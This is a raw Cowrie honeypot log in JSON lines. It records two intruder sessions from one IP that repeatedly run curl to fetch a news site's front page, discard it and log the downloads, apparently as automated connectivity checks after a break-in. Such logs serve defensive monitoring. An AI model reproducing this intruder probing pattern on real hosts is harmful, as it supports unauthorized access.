{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.817795Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.821540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.822475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.825846Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.830010Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.831941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.833124Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.837910Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.840849Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.843483Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.845677Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.848220Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.851595Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.855342Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.859669Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.862983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.864681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.868131Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.869673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.870604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.875689Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.880204Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.881778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.884051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.890511Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.894100Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.897575Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.899658Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.903052Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.905688Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.908144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.911698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.914648Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.915980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.917347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.922332Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.925610Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.930894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.935619Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.939953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.941352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.947624Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.952470Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.955028Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.959352Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.961895Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.964625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.967630Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.970340Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.973303Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.976375Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.978997Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.982060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.983259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.987952Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.991183Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
